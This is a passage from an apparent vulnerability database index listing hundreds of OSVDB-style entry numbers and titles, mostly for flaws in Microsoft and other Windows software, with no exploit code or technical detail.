inplview.aspx Unspecified XSS [79261] Microsoft .NET Framework / Silverlight Buffer Length Calculation XAML Browser Application Handling Remote Memory Corruption [79260] Microsoft .NET Framework / Silverlight Unmanaged Object XAML Browser Application Handling Remote Code Execution [79258] Microsoft Visio Viewer Unspecified Visio File Handling Remote Memory Corruption (2012-0038) [79257] Microsoft Visio Viewer Unspecified Visio File Handling Remote Memory Corruption (2012-0037) [79256] Microsoft Visio Viewer Unspecified Visio File Handling Remote Memory Corruption (2012-0036) [79255] Microsoft Visio Viewer Unspecified Visio File Handling Remote Memory Corruption (2012-0020) [79254] Microsoft Visio Viewer Unspecified Visio File Handling Remote Memory Corruption (2012-0019) [79192] Microsoft IE Javascript Dialog Origin Spoofing [79186] Microsoft IE onunload Location Field Overwrite [79173] Microsoft IE Image Control Title Attribute Status Bar Spoofing [79164] Microsoft IE about:blank Location Bar Overlay Phishing Weakness [79120] Microsoft Live Writer Path Subversion Arbitrary DLL Injection Code Execution [79118] Microsoft RDP Client Path Subversion Arbitrary DLL Injection Code Execution [79116] Microsoft Snapshot Viewer Path Subversion Arbitrary DLL Injection Code Execution [79115] Microsoft MS Clip Book Viewer Path Subversion Arbitrary DLL Injection Code Execution [79114] Microsoft Clip Organizer Path Subversion Arbitrary DLL Injection Code Execution [79113] Microsoft Movie Maker Path Subversion Arbitrary DLL Injection Code Execution [79112] Microsoft Virtual PC Path Subversion Arbitrary DLL Injection Code Execution [79088] Windows Live Messenger (Hotmail) for iPhone Username Local Disclosure [79041] Webmin Samba Windows File Sharing Module /tmp/.webmin Local Password Disclosure [78738] Mozilla Multiple Products mImageBufferSize() Method image/vnd.microsoft.icon Image Encoding Information Disclosure [78442] Oracle VM VirtualBox Windows Guest Additions Component Unspecified Local Issue [78208] Microsoft AntiXSS Library Sanitization Module Escaped CSS Content Parsing XSS Weakness [78057] Microsoft .NET Framework ASP.NET Hash Collision Web Form Post Parsing Remote DoS [78056] Microsoft .NET Framework Forms Authentication Sliding Expiry Cached Content Parsing Remote Code Execution [78055] Microsoft .NET Framework ASP.NET Username Parsing Authentication Bypass [78054] Microsoft .NET Framework Forms Authentication Return URL Handling Arbitrary Site Redirect [77675] Microsoft IE Content-Disposition Header Parsing Cross-Domain Remote Information Disclosure [77674] Microsoft IE Path Subversion Arbitrary DLL Injection Code Execution [77673] Microsoft IE XSS Filter Event Parsing Cross-Domain Remote Information Disclosure [77672] Microsoft Office Publisher Unspecified Publisher File Handling Remote Memory Corruption [77671] Microsoft Office Publisher Invalid Pointer Publisher File Handling Remote Memory Corruption [77670] Microsoft Office Publisher Array Indexing Publisher File Handling Remote Memory Corruption [77669] Microsoft Office Pinyin IME for Simplified Chinese Insecure Configuration Option Local Privilege Escalation [77668] Microsoft Office PowerPoint Path Subversion Arbitrary DLL Injection Code Execution [77665] Microsoft Time ActiveX (DATIME.DLL) Unspecified IE Web Page Handling Remote Code Execution [77664] Microsoft Office PowerPoint OfficeArt Shape Record PowerPoint File Handling Remote Memory Corruption [77661] Microsoft Office Excel Record Parsing Object Handling Remote Memory Corruption [77659] Microsoft Office Use-after-free Border Property Word Document Handling Remote Code Execution [77606] Microsoft IE JavaScript Implementation getComputedStyle Method Page Handling Remote Information Disclosure [77537] Microsoft IE Cache Objects IFRAME Handling Browsing History Disclosure [77228] Microsoft Outlook Client Large Header Handling Message Body Content Injection [76953] Mozilla Multiple Products Windows D2D Hardware Acceleration Same Origin Policy Bypass Remote Information Disclosure [76460] Microsoft Office Publisher pubconv.dll PUB File Handling Overflow [76406] MPlayer on Windows wrapped Allocation Function calloc() Multiple File Handling Remote Overflow [76237] Microsoft Forefront Unified Access Gateway IIS NULL Session Cookie Parsing Remote DoS [76236] Microsoft Forefront Unified Access Gateway MicrosoftClient.jar JAR File Code Execution [76235] Microsoft Forefront Unified Access Gateway ExcelTables Response Splitting Unspecified XSS [76234] Microsoft Forefront Unified Access Gateway Unspecified XSS [76233] Microsoft Forefront Unified Access Gateway ExcelTables Unspecified XSS [76224] Microsoft Host Integration Server Multiple Process Request Parsing Remote Memory Corruption DoS [76223] Microsoft Host Integration Server Multiple Process Request Parsing Infinite Loop Remote DoS [76214] Microsoft .NET Framework / Silverlight Class Inheritance Restriction Web Page Handling Remote Code Execution [76213] Microsoft IE Virtual Function Table Corruption mshtml.dll Extra Size Index Handling Remote Code Execution [76212] Microsoft IE Use-after-free swapNode() Method Body Element Handling Remote Code Execution [76211] Microsoft IE Select Element Handling Uninitialized Object Access Remote Memory Corruption [76210] Microsoft IE Jscript9.dll Uninitialized Object Access Remote Memory Corruption [76209] Microsoft IE Use-after-free OnLoad Event Handling Remote Code Execution [76208] Microsoft IE Use-after-free Type-Safety Weakness Option Element Handling Remote Code Execution [76207] Microsoft IE OLEAuto32.dll Uninitialized Object Access Remote Memory Corruption [76206] Microsoft IE Use-after-free Scroll Event Handling Remote Code Execution [76049] ServersCheck Monitoring windowsaccountsedit.html Multiple Parameter XSS [75537] Google Chrome Windows Media Player Plugin Infobar Bypass [75511] Microsoft HTML Help itss.dll CHM File Handling Overflow [75471] Windows Media Player AVI File Handling Overflow DoS [75394] Microsoft SharePoint Source Parameter Arbitrary Site Redirect [75393] Microsoft SharePoint Unspecified URI XSS [75391] Microsoft SharePoint Contact Details XSS [75390] Microsoft SharePoint EditForm.aspx XSS [75389] Microsoft SharePoint SharePoint Calendar URI XSS [75387] Microsoft Office Excel Unspecified Signedness Error Excel File Handling Memory Corruption [75386] Microsoft Office Excel Unspecified Conditional Expression Parsing Excel File Handling Memory Corruption [75385] Microsoft Office Excel Unspecified Excel File Record Handling Memory Corruption [75384] Microsoft Office Excel Unspecified Array-Indexing Weakness Excel File Handling Memory Corruption [75383] Microsoft Office Excel Unspecified Use-after-free Memory Dereference Excel File Handling Remote Code Execution [75381] Microsoft SharePoint XML / XSL File Handling Unspecified Arbitrary File Disclosure [75380] Microsoft Office MSO.dll Object Pointer Dereference Word Document Handling Remote Code Execution [75379] Microsoft Office MSO.dll Path Subversion Arbitrary DLL Injection Code Execution [75345] Apple QuickTime on Windows Movie File mp4v Tag Image Description Memory Corruption [75289] GTK+ modules/engines/ms-windows/xp_theme.c uxtheme.dll Path Subversion Arbitrary DLL Injection Code Execution [75271] Microsoft SilverLight DataGrid Memory Leak Multiple Element Remote DoS [75269] Microsoft Silverlight DependencyProperty Property Handling Remote DoS [75250] Microsoft IE Unspecified Remote Code Execution [75174] W-Agora on Windows search.php3 bn Parameter Traversal Local File Inclusion [75172] W-Agora on Windows login.php3 bn Parameter Traversal Local File Inclusion [75171] W-Agora on Windows for-print.php3 bn Parameter Traversal Local File Inclusion [75030] Microsoft msxml.dll xsltGenerateIdFunction Heap Memory Address Disclosure Weakness [74976] Joomla! Administrative Modal Windows XSS [74827] Pidgin on Windows gtkutils.c file: URL Arbitrary Program Execution [74689] PHP on Windows SPL Extension SplFileInfo::getType Function Symlink Arbitrary File Overwrite [74525] Bugzilla on Windows Uploaded Attachment Temporary File Local Information Disclosure [74500] Microsoft IE STYLE Object Parsing Memory Corruption [74499] Microsoft IE SetViewSlave() Function XSLT Object Markup Reloading Memory Corruption [74498] Microsoft IE Shift JIS Character Sequence Parsing Cross-domain Remote Information Disclosure [74497] Microsoft IE Event Handler Cross-domain Remote Information Disclosure [74496] Microsoft IE Protected Mode Bypass Arbitrary File Creation [74495] Microsoft IE window.open() Function Race Condition Memory Corruption [74494] Microsoft IE Crafted Link Telnet URI Handler Remote Program Execution [74450] Microsoft IE HTTPS Session HTTP Set-Cookie Header HSTS includeSubDomains Weakness MiTM Arbitrary Cookie Overwrite [74404] Microsoft .NET Framework System.Net.Sockets Code Access Security Bypass Information Disclosure [74403] Microsoft .NET Framework Chart Control Special URI Character GET Request Parsing Remote Information Disclosure [74398] Microsoft Visio Move Around the Block Visio File Handling Remote Code Execution [74397] Microsoft Visio pStream Release Visio File Handling Remote Code Execution [74396] Microsoft Report Viewer Control Unspecified XSS [74207] IBM Tivoli Directory Server (TDS) on Windows cn=changelog Search Remote DoS [74192] Citrix Access Gateway Plugin for Windows NSEPA.NsepaCtrl.1 ActiveX (nsepa.ocx) Certificate Subject DLL Validation MiTM Remote Code Execution [74191] Citrix Access Gateway Plugin for Windows NSEPA.NsepaCtrl.1 ActiveX (nsepa.ocx) Crafted HTTP Header Remote Overflow [74052] Microsoft IE EUC-JP Encoding Unspecified XSS [73977] ArcSight Connector Appliance Windows Event Log SmartConnector Exported Report Files Permissions Weakness Local Log Data Modification [73897] Oracle VM VirtualBox Guest Additions for Windows XPDM Display Driver Local Overflow [73835] Opera Pop-up Windows Text Node Selection DoS [73773] WebKit Windows Functionality Same Origin Policy Bypass Arbitrary File Disclosure [73670] Microsoft IE XSLT Heap Memory Address Information Disclosure [73660] Microsoft Visio Path Subversion Arbitrary DLL Injection Code Execution [73647] Google Chrome on Windows Unspecified Remote Code Execution [73380] Microsoft Lync Web Components Server Reach/Client/WebPages/ReachJoin.aspx reachLocale Parameter XSS [73372] Apple Mac OS X QuickLook Microsoft Office File Handling Memory Corruption [73230] IBM Datacap Taskmaster Capture Cross-domain Username Windows Authentication Remote Bypass [73100] Microsoft Word Insufficient Pointer Validation Memory Corruption [72960] Microsoft SMB Client Response Handling Remote Code Execution [72954] Microsoft IE Vector Markup Language (VML) Object Handling Memory Corruption [72953] Microsoft IE MIME Sniffing Information Disclosure [72952] Microsoft IE CDL Protocol 302 HTTP Redirect Memory Corruption [72951] Microsoft IE selection.empty JavaScript Statement onclick Event Memory Corruption [72950] Microsoft IE layout-grid-char Style Property Handling Memory Corruption [72949] Microsoft IE Drag and Drop Information Disclosure [72948] Microsoft IE Multiple JavaScript Modifications DOM Manipulation Memory Corruption [72947] Microsoft IE Time Element Memory Corruption [72946] Microsoft IE Drag and Drop Memory Corruption [72944] Microsoft IE SafeHTML Function XSS [72943] Microsoft IE vgx.dll imagedata VML Object DOM Modification Memory Corruption [72942] Microsoft IE Link Properties Handling Memory Corruption [72934] Microsoft XML Editor External Entities Resolution Unspecified Information Disclosure [72933] Microsoft Forefront Threat Management Gateway (TMG) Firewall Client Winsock Provider Remote Code Execution [72932] Microsoft .NET Framework JIT Object Validation Arbitrary Code Execution [72931] Microsoft .NET Framework / Silverlight Array Offset Remote Code Execution [72927] Microsoft Office Excel Out of Bounds WriteAV Unspecified Arbitrary Code Execution [72926] Microsoft Office Excel WriteAV Unspecified Arbitrary Code Execution [72925] Microsoft Office Excel File Handling Unspecified Memory Corruption [72924] Microsoft Office Excel File Handling Unspecified Buffer Overflow [72923] Microsoft Office Excel Unspecified Memory Heap Overwrite Arbitrary Code Execution [72922] Microsoft Office Excel Out of Bounds Array Access Unspecified Arbitrary Code Execution [72921] Microsoft Office Excel Improper Record Parsing Unspecified Arbitrary Code Execution [72920] Microsoft Office Excel Insufficient Record Validation Unspecified Arbitrary Code Execution [72916] Autonomy KeyView Windows Write File Processing Overflow [72724] Microsoft IE Cookie Jacking Account Authentication Bypass [72696] Microsoft Reader AOLL Chunk Array Overflow [72695] Microsoft Reader ITLS Header Piece Handling Overflow [72688] Microsoft IE CEnroll tar.setPendingRequestInfo Remote DoS [72687] Microsoft Reader aud_file.dll Audible Audio File Handling Null Byte Memory Corruption [72686] Microsoft Reader msreader.exe Integer Underflow LIT File Handling Overflow [72685] Microsoft Reader msreader.exe LIT File Handling Overflow [72680] Microsoft IE UTF-7 Local Redirection XSS [72679] Microsoft IE Tags javascript:[jscodz] XSS [72677] Microsoft IE Mime-Sniffing Content-Type Handling Weakness [72674] Microsoft IE img Tag Cross-domain Cookie Disclosure [72671] Microsoft Excel Spreadsheet Printing Memory Cleartext PIN Disclosure [72236] Microsoft Office PowerPoint Presentation Parsing Unspecified Overflow [72235] Microsoft Office PowerPoint File Handling Unspecified Memory Corruption [72091] Mozilla Firefox for Windows WebGLES Library Missing ASLR Protection Weakness [71929] HP Virtual Server Environment for Windows Unspecified Remote Privilege Escalation [71856] Microsoft IIS Status Header Handling Remote Overflow [71847] Wireshark on Windows epan/dissectors/packet-nfs.c NFS Dissector DoS [71782] Microsoft .NET Framework x86 JIT Compiler XAML Browser Application (XBAP) Processing Stack Corruption [71777] Microsoft IE Frame Tag Handling Information Disclosure [71771] Microsoft Office PowerPoint TimeColorBehaviorContainer (Techno-color Time Bandit) Floating Point Processing Remote Code Execution [71770] Microsoft Office PowerPoint PersistDirectoryEntry Processing Remote Code Execution [71769] Microsoft Office PowerPoint OfficeArt Atom Parsing Remote Code Execution [71767] Microsoft Office Path Subversion Arbitrary DLL Injection Code Execution [71766] Microsoft Office Excel RealTimeData Record Parsing WriteAV Remote Code Execution [71765] Microsoft Office Excel File Validation Record Handling Overflow [71761] Microsoft Office Excel File Handling Memory Corruption [71760] Microsoft Office Excel File Handling Unspecified Memory Corruption [71759] Microsoft Office Excel External Record Parsing Signedness Overflow [71758] Microsoft Office Excel Substream Parsing Integer Underflow [71726] Microsoft IE JavaScript Unspecified Cross-domain Information Disclosure [71725] Microsoft IE Object Management onPropertyManagement Processing Memory Corruption [71724] Microsoft IE Layouts Handling Memory Corruption [71670] Microsoft IE Pop-up Window Address Bar Spoofing Weakness [71668] Microsoft Visual Studio CPFE.DLL Malformed Source File Handling DoS [71665] Microsoft .NET Framework on XP KB982671 Persistent Firewall Disablement [71596] QTweb for Windows CSS Handling DoS [71595] Apple Safari on Windows CSS Handling DoS [71594] Microsoft IE JavaScript Math.random Implementation Seed Reconstruction Weakness [71400] Adobe Reader / Acrobat on Windows Unspecified Permissions Issue Privilege Escalation (2011-0564) [71354] Nessus Client on Windows Path Subversion Arbitrary DLL Injection Code Execution [71086] Microsoft Visual Studio MFC Applications Path Subversion Arbitrary DLL Injection Code Execution [71017] Microsoft Malware Protection Engine (MMPE) Crafted Registry Key Local Privilege Escalation [70904] Microsoft Office Excel OfficeArt Container Parsing Memory Corruption [70857] Metasploit Framework on Windows Insecure Filesystem Permissions Local Privilege Escalation [70850] Windows Azure SDK Web Role Session Cookies State Information Disclosure [70833] Microsoft IE Insecure Library Loading Remote Code Execution [70832] Microsoft IE mshtml.dll Dangling Pointer Memory Corruption Remote Code Execution [70831] Microsoft IE Uninitialized Memory Corruption Remote Code Execution (2011-0035) [70829] Microsoft Visio Unspecified Data Type Handling Memory Corruption Remote Code Execution [70828] Microsoft Visio LZW Stream Decompression Exception Remote Code Execution [70821] Microsoft OpenType Compact Font Format (CFF) Parsing Remote Code Execution [70813] Microsoft Office PowerPoint OfficeArt Container Parsing Remote Code Execution [70812] Microsoft Office Excel Invalid Object Type Handling Remote Code Execution [70811] Microsoft Office Excel Axis Properties Record Parsing Overflow [70810] Microsoft Office Excel Drawing File Format Shape Data Parsing Use-after-free Arbitrary Code Execution [70726] Opera on Windows Downloads Manager Filesystem Viewing Application Pathname Verification Weakness Arbitrary Code Execution [70622] HP Business Service Management on Windows Unspecified XSS [70557] Oracle Database Server on Windows Cluster Verify Utility Named Pipe Arbitrary Local Command Execution [70509] Oracle Sun Directory Server Enterprise Edition Identity Synchronization for Windows Unspecified Local Issue [70444] Microsoft Data Access Components (MDAC / WDAC) MSADO Record CacheSize Handling Remote Code Execution [70443] Microsoft Data Access Components (MDAC / WDAC) ODBC API (odbc32.dll) SQLConnectW Function DSN / szDSN Argument Handling Overflow [70392] Microsoft IE DOM Implementation cross_fuzz GUI Display Weakness [70391] Microsoft IE MSHTML.DLL ReleaseInterface Function Use-after-free Arbitrary Code Execution [70167] Microsoft IIS FTP Server Telnet IAC Character Handling Overflow [70142] ManageEngine globalSettings.do newWindows Parameter XSS [70012] Opera on Windows Insecure Third Party Module Warning Message Implementation Weakness [69942] Microsoft WMI Administrative Tools WEBSingleView.ocx ActiveX Remote Code Execution [69830] Microsoft IE Cross-Domain Information Disclosure (2010-3348) [69829] Microsoft IE HTML+Time Element outerText Memory Corruption [69828] Microsoft IE Recursive Select Element Remote Code Execution [69827] Microsoft IE Animation HTML Object Memory Corruption (2010-3343) [69826] Microsoft IE Cross-Domain Information Disclosure (2010-3342) [69825] Microsoft IE HTML Object Memory Corruption (2010-3340) [69817] Microsoft SharePoint Office Document Load Balancer Crafted SOAP Request Remote Code Execution [69815] Microsoft Office Publisher Array Indexing Memory Corruption [69814] Microsoft Office Publisher Malformed PUB File Handling Memory Corruption [69813] Microsoft Office Publisher pubconv.dll Array Indexing Memory Corruption [69812] Microsoft Office Publisher pubconv.dll Unspecified Heap Overrun [69811] Microsoft Office Publisher pubconv.dll Size Value Handling Heap Corruption [69810] Microsoft Exchange Server store.exe Malformed MAPI Request Infinite Loop Remote DoS [69809] Microsoft Office FlashPix Image Converter Tile Data Handling Heap Corruption [69808] Microsoft Office FlashPix Image Converter Picture Set Processing Overflow [69807] Microsoft Office Document Imaging Endian Conversion TIFF Image Handling Memory Corruption [69806] Microsoft Office TIFF Image Converter Endian Conversion Buffer Overflow [69805] Microsoft Office TIFF Import/Export Graphic Filter Converter Multiple Overflows [69804] Microsoft Office PICT Image Converter Overflow [69803] Microsoft Office CGM Image Converter Overflow [69796] Microsoft IE CSS Parser mshtml.dll CSharedStyleSheet::Notify Function Use-after-free Remote Code Execution [69771] Mozilla Multiple Products For Windows Line-breaking document.write Call Arbitrary Code Execution [69753] Apple QuickTime on Windows Crafted Track Header Atom Overflow [69752] Apple QuickTime on Windows Apple Computer Directory Permissions Weakness Local Information Disclosure [69606] AWStats on Windows awstats.cgi configdir Parameter Crafted Share Config File Arbitrary Command Execution [69311] Apple Mac OS X QuickLook Crafted Microsoft Office Document Handling Overflow [69095] Microsoft Forefront Unified Access Gateway (UAG) Signurl.asp XSS [69094] Microsoft Forefront Unified Access Gateway (UAG) Mobile Portal Website Unspecified XSS [69093] Microsoft Forefront Unified Access Gateway (UAG) EOP Unspecified XSS [69092] Microsoft Forefront Unified Access Gateway (UAG) Redirection Spoofing Weakness [69091] Microsoft Office PowerPoint File Animation Node Parsing Underflow Heap Corruption [69090] Microsoft Office PowerPoint 95 File Parsing Overflow [69089] Microsoft Office Insecure Library Loading Remote Code Execution [69088] Microsoft Office MSO Large SPID Read AV Remote Code Execution [69087] Microsoft Office Drawing Exception Handling Remote Code Execution [69086] Microsoft Office Art Drawing Record Parsing Remote Code Execution [69085] Microsoft Office 2010 RTF File Handling pFragments Buffer Overflow Arbitrary Code Execution [68987] Microsoft IE mshtml CSS Tag Use-after-free Memory Corruption [68918] Windows Server 2008 Color Control Panel Path Subversion Arbitrary DLL Injection Code Execution [68855] Microsoft IE window.onerror Error Handling URL Destination Information Disclosure [68585] Microsoft Foundation Classes (MFC) Library Window Title Handling Remote Overflow [68584] Microsoft Office Word Uninitialized Pointer Handling Remote Code Execution [68583] Microsoft Office Word Unspecified Boundary Check Remote Code Execution [68582] Microsoft Office Word Array Index Value Handling Unspecified Remote Code Execution [68581] Microsoft Office Word File Unspecified Structure Handling Stack Overflow [68580] Microsoft Office Word Return Value Handling Unspecified Remote Code Execution [68579] Microsoft Office Word Bookmark Handling Invalid Pointer Remote Code Execution [68578] Microsoft Office Word Pointer LFO Parsing Double-free Remote Code Execution [68577] Microsoft Office Word Malformed Record Handling Remote Heap Overflow [68576] Microsoft Office Word BKF Object Parsing Array Indexing Remote Code Execution [68575] Microsoft Office Word File LVL Structure Parsing Remote Code Execution [68574] Microsoft Office Word File Record Parsing Unspecified Memory Corruption [68573] Microsoft Office Excel File Unspecified Record Parsing Remote Integer Overflow [68572] Microsoft Office Excel Formula Record Parsing Memory Corruption (2010-3231) [68571] Microsoft Office Excel File Format Parsing Remote Code Execution [68570] Microsoft Office Excel Lotus 1-2-3 Workbook Parsing Remote Overflow [68569] Microsoft Office Excel Formula Substream Record Parsing Memory Corruption [68568] Microsoft Office Excel Formula Biff Record Parsing Remote Code Execution [68567] Microsoft Office Excel Out Of Bounds Array Handling Remote Code Execution [68566] Microsoft Office Excel Merge Cell Record Pointer Handling Remote Code Execution [68565] Microsoft Office Excel Negative Future Function Parsing Remote Code Execution [68564] Microsoft Office Excel PtgExtraArray Structure Parsing Remote Code Execution [68563] Microsoft Office Excel RealTimeData Record Array Parsing Remote Code Execution [68562] Microsoft Office Excel Out-of-Bounds Memory Write in Parsing Memory Corruption [68561] Microsoft Office Excel Ghost Record Type Parsing Remote Code Execution [68556] Microsoft .NET Framework x64 JIT Compiler Unprivileged Application Remote Code Execution [68548] Microsoft IE / SharePoint Unspecified XSS [68547] Microsoft IE CSS Special Character Processing Unspecified Information Disclosure [68546] Microsoft IE Object Handling Unspecified Memory Corruption (2010-3326) [68545] Microsoft IE Anchor Element Handling Unspecified Information Disclosure [68544] Microsoft IE AutoComplete Functionality Unspecified Information Disclosure [68543] Microsoft IE HtmlDlgHelper Class Object Handling Memory Corruption [68542] Microsoft IE CSS imports() Cross-domain Information Disclosure [68541] Microsoft IE mshtml.dll CAttrArray::PrivateFind Function Object Handling Memory Corruption [68540] Microsoft IE mshtml.dll Object Handling Uninitialized Memory Corruption (2010-3331) [68438] Microsoft XSS Filter Library Bypass [68413] Adobe Reader / Acrobat on Windows Unspecified ActiveX Arbitrary Code Execution [68362] Apple Safari on Windows Webkit.dll Malformed SGV Text Style Handling DoS [68151] Microsoft Office Word MSO.dll Crafted Document Buffer NULL Dereference DoS [68127] Microsoft ASP.NET ViewState Cryptographic Padding Remote Information Disclosure [68123] Microsoft IE / SharePoint toStaticHTML Function Crafted CSS @import Rule XSS Protection Mechanism Bypass [67984] Microsoft Multiple Products Unicode Scripts Processor (Usp10.dll) OpenType Font Processing Memory Corruption [67982] Microsoft Outlook E-mail Content Parsing Remote Overflow [67980] Microsoft IIS Unspecified Remote Directory Authentication Bypass [67979] Microsoft IIS FastCGI Request Header Handling Remote Overflow [67978] Microsoft IIS Repeated Parameter Request Unspecified Remote DoS [67977] Microsoft Visual C++ Redistributable Path Subversion Arbitrary DLL Injection Code Execution [67973] HP Data Protector Express on Windows dpwindtb.dll DtbClsLogin() Function Overflow [67960] Apple Safari on Windows Path Subversion Arbitrary DLL Injection Code Execution [67834] Microsoft IE Cross-Origin CSS Style Sheet Handling Information Disclosure [67795] HP Operations Agent on Windows Unspecified Remote Code Execution [67794] HP Operations Agent on Windows Unspecified Local Privilege Escalation [67733] RealPlayer on Windows RealMedia IVR File Malformed Header Index Array Error Arbitrary Code Execution [67730] RealPlayer on Windows Unspecified Access Restriction Remote Bypass [67704] IBM DB2 Universal Database on Windows User / Group Enumeration DoS [67602] Apple QuickTime on Windows Path Subversion Arbitrary DLL Injection Code Execution [67598] Microsoft Office OneNote Path Subversion Arbitrary DLL Injection Code Execution [67597] Microsoft Office Word Path Subversion Arbitrary DLL Injection Code Execution [67596] Microsoft Office Excel Path Subversion Arbitrary DLL Injection Code Execution [67595] Microsoft Office Access Path Subversion Arbitrary DLL Injection Code Execution [67594] Microsoft Outlook Path Subversion Arbitrary DLL Injection Code Execution [67547] Apple Safari on Windows Path Subversion Arbitrary DLL Injection Code Execution [67546] Microsoft Visio Path Subversion Arbitrary DLL Injection Code Execution [67503] Microsoft Outlook Express Path Subversion Arbitrary DLL Injection Code Execution [67484] Microsoft Office Groove Path Subversion Arbitrary DLL Injection Code Execution [67483] Microsoft Office PowerPoint Path Subversion Arbitrary DLL Injection Code Execution [67463] Microsoft IE location.replace Address Bar Spoofing [67455] Google Chrome Windows Kernel Flaw Mitigation Weakness Unspecified Issue [67365] Microsoft IE removeAttribute() Method Multiple HTML Element Handling NULL Pointer DoS [67329] Apple iTunes for Windows Path Subversion Arbitrary DLL Injection Code Execution [67258] Microsoft ClickOnce MITM Weakness [67132] Microsoft IE Modal Application Prompt Rendering Unspecified DoS [67131] Microsoft IE mshtml.dll Malformed CSS Handling DoS [67121] Windows Mobile on HTC Unspecified Client-side Issue [67119] Microsoft Outlook Web Access (OWA) Multiple Function CSRF [67003] Microsoft IE HTML Layout Table Element Handling Memory Corruption [67002] Microsoft IE Object Handling Unspecified Memory Corruption (2010-2559) [67001] Microsoft IE CIframeElement Object Handling Race Condition Memory Corruption [67000] Microsoft IE boundElements Property Handling Memory Corruption [66999] Microsoft IE OnPropertyChange_Src() Function Malformed HTML/JS Data Handling Memory Corruption [66998] Microsoft IE Event Handler Unspecified Cross-domain Information Disclosure [66997] Microsoft Office Word DOC plcffldMom Parsing Memory Corruption [66996] Microsoft Office Word RTF Document Object Control Word Drawing Overflow [66995] Microsoft Office Word RTF Document Control Word Parsing Memory Corruption [66994] Microsoft Office Word Malformed Record Parsing Unspecified Remote Code Execution [66993] Microsoft .NET Framework / Silverlight CLR Virtual Delegate Handling Remote Code Execution [66992] Microsoft Silverlight Pointer Handling Unspecified Memory Corruption [66991] Microsoft Office Excel PivotTable Cache Data Record Handling Overflow [66973] Microsoft XML Core Services Msxml2.XMLHTTP.3.0 ActiveX HTTP Response Handling Memory Corruption [66752] Google Chrome Windows Kernel Flaw Mitigation Weakness Unspecified Issue [66458] Microsoft DirectX DirectPlay Unspecified NULL Dereference Remote DoS [66457] Microsoft DirectX DirectPlay Unspecified Packet Handling Remote DoS [66381] HP Insight Orchestration for Windows Unspecified Remote Data Modification [66337] Oracle Database Server on Windows Net Foundation Layer Component Unspecified DoS (2010-0903) [66334] Oracle Database Server on Windows Network Layer Component Unspecified Remote Issue (2010-0900) [66296] Microsoft Outlook SMB Attachment Handling Arbitrary Program Execution [66295] Microsoft IE / Office FieldList ActiveX (ACCWIZ.dll) Remote Code Execution [66294] Microsoft Office Access AccWizObjects ActiveX Remote Code Execution [66263] HP Virtual Connect Enterprise Manager for Windows Unspecified XSS [66219] Microsoft Help Files (.CHM) Locked File Functionality Bypass [66160] Microsoft IIS Basic Authentication NTFS Stream Name Permissions Bypass [66040] Ruby on Windows ARGF.inplace_mode Variable Local Overflow [65794] Microsoft IE Cross-domain IFRAME Gadget Focus Change Restriction Weakness Keystroke Disclosure [65531] nginx on Windows URI ::$DATA Append Arbitrary File Access [65503] Microsoft IE CImWebObj ActiveX Local Overflow DoS [65502] Microsoft IE Unspecified DoS [65487] NovaBACKUP Network / NovaNet on Windows Unspecified Remote Arbitrary Code Execution [65441] Microsoft .NET ASP.NET Form Control __VIEWSTATE Parameter XSS [65343] Microsoft IE ICMFilter Arbitrary UNC File Access [65294] nginx on Windows Encoded Space Request Remote Source Disclosure [65242] CA ARCserve Backup on Windows Unspecified Local Information Disclosure [65239] Microsoft Office Excel String Variable Handling Unspecified Code Execution [65238] Microsoft Office Excel Malformed RTD Handling Memory Corruption [65237] Microsoft Office Excel Malformed RTD Record Handling Memory Corruption [65236] Microsoft Office Excel Malformed OBJ Record Handling Overflow [65235] Microsoft Office Excel Malformed HFPicture Handling Memory Corruption [65234] Microsoft Office Excel on Mac OS X Open XML Permission Weakness [65233] Microsoft Office Excel Unspecified Memory Corruption (2010-0823) [65232] Microsoft Office Excel Malformed ExternName Record Handling Memory Corruption [65231] Microsoft Office Excel Malformed WOPT Record Handling Memory Corruption [65230] Microsoft Office Excel EDG / Publisher Record Handling Memory Corruption [65229] Microsoft Office Excel SxView Record Handling Memory Corruption [65228] Microsoft Office Excel ADO Object DBQueryExt Record Handling Arbitrary Code Execution [65227] Microsoft Office Excel SXVIEW Record Parsing Memory Corruption [65226] Microsoft Office Excel Unspecified Record Handling Stack Corruption Arbitrary Code Execution [65220] Microsoft SharePoint Crafted Request Help Page Invocation Remote DoS [65218] Microsoft IE 8 Developer Tools ActiveX Remote Code Execution [65216] Microsoft IIS Extended Protection for Authentication Memory Corruption [65215] Microsoft IE Uninitialized Object Handling Memory Corruption (2010-1259) [65214] Microsoft IE Uninitialized Object Handling Memory Corruption (2010-1261) [65213] Microsoft IE HTML Element Handling Memory Corruption [65212] Microsoft IE CStyleSheet Object Handling Memory Corruption [65211] Microsoft IE / Sharepoint toStaticHTML Information Disclosure [65150] Microsoft ASP.NET HtmlContainerControl InnerHtml Property Setting Weakness XSS [65110] Microsoft IE Invalid news / nntp URI IFRAME Element Handling Remote DoS [65024] Microsoft Access Backslash Escaped Input SQL Injection Protection Bypass [65013] Microsoft .NET ASP.NET EnableViewStateMac Property Default Configuration XSS [64980] Microsoft Outlook Web Access (OWA) URI id Parameter Information Disclosure [64978] HTC Windows Mobile SMS Preview PopUp SMS Message XSS [64952] Microsoft IE img Tag Hijacking Weakness [64944] Microsoft Dynamics GP Default System Password [64848] Microsoft Dynamics GP System Password Field Substitution Cipher Weakness [64828] Microsoft IE history go ActiveX Overflow DoS [64824] Microsoft IE Address Bar Character Conversion Spoofing Weakness [64794] Microsoft Multiple Products smtpsvc.dll DNS Implementation Predictable Transaction ID MitM DNS Response Spoofing Weakness [64793] Microsoft Multiple Products smtpsvc.dll DNS Implementation ID Transaction Validation MiTM DNS Response Spoofing Weakness [64791] Mozilla Firefox on Windows JavaScript P Element xul.dll gfxWindowsFontGroup::MakeTextRun Function DoS [64790] Mozilla Firefox on Windows JavaScript P Element String Handling DoS [64789] Mozilla Firefox on Windows JavaScript String Concatenation Substring Operation NULL Dereference DoS [64786] Microsoft IE mailto: URL Multiple IFRAME Element Handling DoS [64702] Apple Safari on Windows HTTP Authorization: Basic Header Logging Cross-domain Information Disclosure [64666] Microsoft IE Invisible Hand Extension HTTP Request Logging Cookie Product Search Disclosure [64615] HP Insight Control Server Migration for Windows Unspecified XSS [64539] Microsoft Office OCX ActiveX Controls OpenWebFile() Arbitrary Program Execution [64533] Microsoft IE document.createElement NULL Dereference DoS [64531] Microsoft Outlook Web Access (OWA) Path Traversal Attachment Handling Weakness [64529] Microsoft Visual Basic for Applications VBE6.dll Single-Byte Stack Overwrite [64446] Microsoft Office Visio VISIODWG.DLL Crafted DXF File Handling Overflow [64387] Apple Safari on Windows data.length Handling Local DoS [64384] OpenOffice.org (OOo) on Windows slk File Parsing NULL Pointer DoS [64170] Microsoft SharePoint 